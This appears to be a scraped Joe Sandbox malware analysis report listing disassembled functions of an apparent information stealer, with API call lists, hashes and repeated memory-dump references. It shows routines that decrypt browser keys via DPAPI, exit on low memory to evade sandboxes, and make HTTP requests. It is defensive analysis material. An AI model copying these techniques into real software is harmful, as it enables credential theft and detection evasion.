Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 2149ab232c4330f0f16383b33d4e2f478f768794b3b99ae118ffd4f7c57347a5
Instruction ID: a8820fc4ae710e3131b90ad71e841ef9f2e27f2a64c9683623a8d81eecbe3db0
Opcode Fuzzy Hash: 2149ab232c4330f0f16383b33d4e2f478f768794b3b99ae118ffd4f7c57347a5
Instruction Fuzzy Hash: 7C313EB5D10109ABDF04EBECDC85AEEB7B8FB49304F184519E905E7241EB349A04CBA1

Function 008A6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01429228,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A6AE8
CloseHandle.KERNEL32(00000000), ref: 008A6AF9
Sleep.KERNEL32(00001770), ref: 008A6B04
CloseHandle.KERNEL32(?,00000000,?,01429228,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6B1A
ExitProcess.KERNEL32 ref: 008A6B22

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: c692ec6240cc0ff7101865fab68011461855501ca6ddff207af16a3ba357d4b4
Instruction ID: 7018df1aa33ca82a20cb599ef4812cd208e503bfeb1646799937dd96f2c75988
Opcode Fuzzy Hash: c692ec6240cc0ff7101865fab68011461855501ca6ddff207af16a3ba357d4b4
Instruction Fuzzy Hash: 8AF05E30A40219ABF700EBE0DC06BBE7B74FB16701F184515F513E19C5EBB06542D667

Function 008947B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Strings

<, xrefs: 008947C9

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: a8782f85624e613eced6275293095dd8510bbe07508910f4891149a60fbb60ff
Instruction ID: fd41ed0f007817ed7d8ee122d33cbd21a238d585ae2d19f5c287152df8c30535
Opcode Fuzzy Hash: a8782f85624e613eced6275293095dd8510bbe07508910f4891149a60fbb60ff
Instruction Fuzzy Hash: CF2142B1D01209ABDF14DFA4E845BDE7775FB45310F108625F515A72C1EB706605CF82

Function 008A51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 00896280: InternetOpenA.WININET(008B0DFE,00000001,00000000,00000000,00000000), ref: 008962E1
Part of subcall function 00896280: StrCmpCA.SHLWAPI(?,0142E808), ref: 00896303
Part of subcall function 00896280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00896335
Part of subcall function 00896280: HttpOpenRequestA.WININET(00000000,GET,?,0142E1B8,00000000,00000000,00400100,00000000), ref: 00896385
Part of subcall function 00896280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008963BF
Part of subcall function 00896280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008963D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5228

Strings

ERROR, xrefs: 008A521A
ERROR, xrefs: 008A5273

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 457706d754239a820148cfafb51c40904e5f2ac52935ae4d2766bf8515e4c741
Instruction ID: 28747376b9a81143240a9141a3e100ca4d403065c259776c2f2cc8f2b72cd7b6
Opcode Fuzzy Hash: 457706d754239a820148cfafb51c40904e5f2ac52935ae4d2766bf8515e4c741
Instruction Fuzzy Hash: 5E11DD30910548ABEB58FB68DD96AED7378FF51340F804164F81A9AD92EF346B06C692

Function 00891220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0089123E
ExitProcess.KERNEL32 ref: 00891294

Strings

@, xrefs: 00891233

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: ef7513d8fe1345bf1140a6475b7348fa0eff4ea1415cc319f003d48cd071aaf7
Instruction ID: a95a0899e3d0815a658c74f01ddf34172eb622467f9736dd344952e0a98d5456
Opcode Fuzzy Hash: ef7513d8fe1345bf1140a6475b7348fa0eff4ea1415cc319f003d48cd071aaf7
Instruction Fuzzy Hash: 7C01FBB0E44309AAEF10FBE4CD49B9EBB78FB14705F248049E606F66C0D7746645879A

Function 008A4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4F7A
lstrcat.KERNEL32(?,008B1070), ref: 008A4F97
lstrcat.KERNEL32(?,01429078), ref: 008A4FAB
lstrcat.KERNEL32(?,008B1074), ref: 008A4FBD

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
Part of subcall function 008A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
Part of subcall function 008A4910: FindClose.KERNEL32(000000FF), ref: 008A4B92

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 08f6b66b94fb0740dbc09a9e0f76eca9eeedf28caae52dd5085528fe7f35e02d
Instruction ID: a1910985d76d4c438ae18a451b943d96c214c42a15191024e9bba4fd32cdede3
Opcode Fuzzy Hash: 08f6b66b94fb0740dbc09a9e0f76eca9eeedf28caae52dd5085528fe7f35e02d
Instruction Fuzzy Hash: 1D21D876900204ABCB54FBA4EC46EEE373CF765300F004545B65AD6581EE7496C98BA3

Function 008A0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01428F78), ref: 008A079A
StrCmpCA.SHLWAPI(00000000,01429048), ref: 008A0866
StrCmpCA.SHLWAPI(00000000,014290F8), ref: 008A099D

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 73cc868aac5781af48c8f2ce29d1dc3e57d4f687b2ad67f7704d6183d7261515
Instruction ID: 9cddff2d45f51fa2abce377bdc27cd906f39c70aa6c186f0e4d00fddc46660f4
Opcode Fuzzy Hash: 73cc868aac5781af48c8f2ce29d1dc3e57d4f687b2ad67f7704d6183d7261515
Instruction Fuzzy Hash: 56915875A101089FDF18EF68D995AEE77B5FF95300F408519E80ADF641DB30AA05CB93

Function 008A0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01428F78), ref: 008A079A
StrCmpCA.SHLWAPI(00000000,01429048), ref: 008A0866
StrCmpCA.SHLWAPI(00000000,014290F8), ref: 008A099D

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd
